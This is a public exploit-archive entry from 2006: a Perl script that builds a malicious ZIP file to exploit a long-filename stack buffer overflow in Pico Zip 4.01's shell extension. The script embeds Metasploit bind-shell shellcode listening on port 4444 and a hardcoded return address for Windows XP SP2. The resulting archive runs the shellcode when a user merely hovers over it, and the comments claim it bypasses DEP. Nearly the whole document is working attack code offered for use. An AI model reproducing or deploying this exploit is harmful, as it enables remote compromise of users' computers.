Pico Zip 4.01 - 'Filename' Local Buffer Overflow

EDB-ID:

1917

Author:

c0rrupt

Type:

local

Platform:

Windows

Published:

2006-06-15

#!/usr/bin/perl
# Pico Zip v. 4.01 Long Filename Buffer Overflow
# Original advisory - http://www.securityfocus.com/archive/1/437103/30/30/threaded
# Author - c0rrupt
# Greets - sh0uts to n0limit, muts, and brax for the music ;)
#
# The vulnerability is caused due to a boundary error within the
# "zipinfo.dll" info tip shell extension when reading a ACE, RAR, or
# ZIP archive that contains a file with an overly long filename. This
# can be exploited to cause a stack-based buffer overflow when the user
# moves the mouse cursor over a malicious archive either in Windows
# Explorer or from any program that uses the file-open dialog box.
#
# Running this script will generate a malformed zip file that will execute
# the given shellcode when a user moves his cursor over the file.
# (This exploit bypasses stack protection and DEP)

$offset = "\x6F\xE2\xD7\x5A"; #Windows XP SP2 English

# win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
$shellcode = 
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa3".
"\x52\xaa\x9a\x83\xeb\xfc\xe2\xf4\x5f\x38\x41\xd7\x4b\xab\x55\x65".
"\x5c\x32\x21\xf6\x87\x76\x21\xdf\x9f\xd9\xd6\x9f\xdb\x53\x45\x11".
"\xec\x4a\x21\xc5\x83\x53\x41\xd3\x28\x66\x21\x9b\x4d\x63\x6a\x03".
"\x0f\xd6\x6a\xee\xa4\x93\x60\x97\xa2\x90\x41\x6e\x98\x06\x8e\xb2".
"\xd6\xb7\x21\xc5\x87\x53\x41\xfc\x28\x5e\xe1\x11\xfc\x4e\xab\x71".
"\xa0\x7e\x21\x13\xcf\x76\xb6\xfb\x60\x63\x71\xfe\x28\x11\x9a\x11".
"\xe3\x5e\x21\xea\xbf\xff\x21\xda\xab\x0c\xc2\x14\xed\x5c\x46\xca".
"\x5c\x84\xcc\xc9\xc5\x3a\x99\xa8\xcb\x25\xd9\xa8\xfc\x06\x55\x4a".
"\xcb\x99\x47\x66\x98\x02\x55\x4c\xfc\xdb\x4f\xfc\x22\xbf\xa2\x98".
"\xf6\x38\xa8\x65\x73\x3a\x73\x93\x56\xff\xfd\x65\x75\x01\xf9\xc9".
"\xf0\x01\xe9\xc9\xe0\x01\x55\x4a\xc5\x3a\xbb\xc6\xc5\x01\x23\x7b".
"\x36\x3a\x0e\x80\xd3\x95\xfd\x65\x75\x38\xba\xcb\xf6\xad\x7a\xf2".
"\x07\xff\x84\x73\xf4\xad\x7c\xc9\xf6\xad\x7a\xf2\x46\x1b\x2c\xd3".
"\xf4\xad\x7c\xca\xf7\x06\xff\x65\x73\xc1\xc2\x7d\xda\x94\xd3\xcd".
"\x5c\x84\xff\x65\x73\x34\xc0\xfe\xc5\x3a\xc9\xf7\x2a\xb7\xc0\xca".
"\xfa\x7b\x66\x13\x44\x38\xee\x13\x41\x63\x6a\x69\x09\xac\xe8\xb7".
"\x5d\x10\x86\x09\x2e\x28\x92\x31\x08\xf9\xc2\xe8\x5d\xe1\xbc\x65".
"\xd6\x16\x55\x4c\xf8\x05\xf8\xcb\xf2\x03\xc0\x9b\xf2\x03\xff\xcb".
"\x5c\x82\xc2\x37\x7a\x57\x64\xc9\x5c\x84\xc0\x65\x5c\x65\x55\x4a".
"\x28\x05\x56\x19\x67\x36\x55\x4c\xf1\xad\x7a\xf2\x53\xd8\xae\xc5".
"\xf0\xad\x7c\x65\x73\x52\xaa\x9a";



$filename = $shellcode . "A"x(524-length($shellcode)) . $offset;


$head   = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00".
	  "\xB7\xAC\xCE\x34\x00\x00\x00\x00\x00\x00".
	  "\x00\x00\x00\x00\x00\x00\x14\x02\x00\x00";

$middle = "\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00".
          "\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34".
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
	  "\x00\x00\x14\x02\x00\x00\x00\x00\x00\x00".
          "\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00";

$tail   = "\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00".
 	  "\x00\x00\x01\x00\x01\x00\x42\x02\x00\x00".
          "\x32\x02\x00\x00\x00\x00";

$evilzip = $head . $filename . $middle . $filename . $tail;

open(ZIPFILE,">exploit.zip")|| die "cannot open output file";
print(ZIPFILE $evilzip) || die "cannot write to output file";
close(ZIPFILE);

# milw0rm.com [2006-06-15]